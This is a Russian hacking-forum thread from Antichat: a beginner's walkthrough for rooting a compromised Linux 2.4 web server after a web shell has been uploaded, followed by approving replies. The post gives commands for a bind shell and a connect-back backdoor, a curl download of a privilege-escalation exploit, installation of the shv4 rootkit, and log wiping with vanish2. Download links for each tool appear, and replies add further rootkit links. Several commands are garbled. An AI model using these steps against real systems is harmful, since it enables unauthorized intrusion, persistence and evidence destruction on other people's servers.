![]() |
R00t me №1
Решил написать статейку для расширения кругозора новичков античата в целом.
Думаю, она многим понадобится и даст маленький толчок в дальнейшем развитии. Статья предназначена для тех, кто уже умеет заливать веб-шелл и ознакомлен со всеми его прелестями... Итак – мы залили шелл. Что же делать дальше? Отдаём первую команду: Код:
uname –aLinux nalog.com 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux Ядро старо,как мир.Нашей задачей будет поднять свои привилегии до максимальных aka root.Описание взлома всех версий линуксов,фрях,ect описать не реально-так что в этой статье будем говорить исключительно о Linux 2.4.20-8. Погнали) Для начала проделаем следующие шаги: 1) Код:
cd /tmpКод:
chmod +x bind.plКод:
nc sitename 32767При открытии окна командуем: id.Работает? Отлично) Но межет и не работать если фаер фильтрует соединение( Тогда скачиваем Connect-Back Backdoor (bd.c) Код:
chmod +x bd.cКод:
-l –p 4000Код:
./db 127.0.0.1Где 127.0.0.1 ваш реальный ip. И вот в окошке появилась надпись - Connected to CommandLine... Приступим к решительным действиям: Скачиваем сплойт для этой версии ядра-вполне должен подойти mremap_pte,но я советую воспользоваться xpl_brk ,т.к он меня редко подводил. Скачиваем уже cкомпилированный сплойт: Код:
curl http://xpl.netmisphere2.com/xpl_brk http://img286.imageshack.us/img286/4...62020245gg.png Надо закрепиться в системе для этого скачиваем руткит-возьмём shv4 Код:
curl http://splo1t.narod.ru/rootkits/shv4.tar.gzЗаходит в putty указываем сайт, порт и конектимся. Имя root,а пароль тот что вы указали при настройке. В моём случае это pass. Зашли? Выполняем команду: Код:
nestat -anОсталось, почистить логи. Скачиваем один из лучших клинеров под *nix -vanish2 Код:
chmod +x vanish2.Код:
gcc vanish2.c –o vanishКод:
./vanish root name_site 127.0.0.1Видим надпись: V_A_N_I_S_H_E_D_! Которая не может не радовать глаз. _ _ _ _ _ _ _ _ _ _ _ _ _ _ На этом моя статейка кончается-надеюсь она поможет новичкам... Ссылки: r57Shell: http://hcr.3dn.ru/expl/php/r57shell.txt Netcat:http://pro-hack.ru/download/s_nettools_2.html bind.pl: http://nsd.ru/soft/1/ano/bind.pl.txt Connect-Back Backdoor: http://desrow.narod.ru/www/bd.rar xpl_brk: http://desrow.narod.ru/exploits/xpl_brk.rar shv4: http://desrow.narod.ru/rootkits/shv4_.rar Putty: http://pro-hack.ru/download/s_nettools_4.html vanish2: http://nsd.ru/soft/1/anonimus/vanish2.tgz For any link pass:antichat =====[ Desr0w | | 12.04.2006 ]===== |
Молодец, хорошая статья.
|
ну так, опять ничего особенного :)
для новичков пойдёт, но надо было бы расписать значение набранных команд... + всё же поставлю... |
Как раз для новичков =) Нормуль!
|
Хорошая статья.... кста, в Nfm уже сразу сплойты есть.... скачиваются сразу скомпиленными.....
|
хмм статья конечно для новечков ничего, тока вот shv4 или 5 ставить не советую, так как он палит порт и легго пропаливается нмапом при сканировании.
советую лучше suckit http://packetstormsecurity.org/UNIX/...sk-1.3a.tar.gz тока собирается он не всегда. или adore если есть шелл доступ http://www.eviltime.com/download_id.php?id=147 или смотрим руткиты на этой паге http://www.eviltime.com/download.php...bpage=rootkits |
А почему бы не сразу СЮДА?))
|
Цитата:
Ну мне не сложно: pwd Эта команда выводит на экран полный путь к текущему каталогу. В любой момент можно узнать где вы находитесь. ls Команда ls выводит список файлов и подкаталога. По умолчанию файлы начинающиеся с точки (.) скрываются. Чтобы их увидеть надо добавить ключ -a: ls -a Для полной инфы от папках и файлах и ссылках: ls -al Хотим просмотреть файлы в других дирах: Код:
ls -al /tmpcd команда позволяет сменить текщий каталог: Код:
cd /tmp/bbbнапример в каталоге bbb есть подкаталог bb-перейдём в него. Код:
cd bbКод:
cd ..Создание директории. Например: Код:
mkdir antichatУдаление файлов. Для удаления директорий нужны след. ключи: -d -- удалить директорию. -r -- удалять содержимое директорий. -f --не спрашивать подтверждение на удаление. Код:
rm -rf /tmp/bbb/antichattar В никсах нет винрара:) Архивы поставляются в виде tar.gz Разархивируем: Код:
tar xzvf namefile.tar.gzКоманда предназначена для того,чтобы узнать каталог в котором находится программа. Мы например узнаём какая качалка стоит на серве. Пример: Код:
which ls А..И еще немного о качалках: Самая распространенная -wget есть еще: curl fetch lynx links GET зы: uname -a показывает версию системы и еще кое что. id -показывает ваши права. hostname показывает имя сайта. есть ключ -i Код:
hostname -iThe end. |
Описание руткитов:тут
|
неплохо молодец
|
| Время: 00:17 |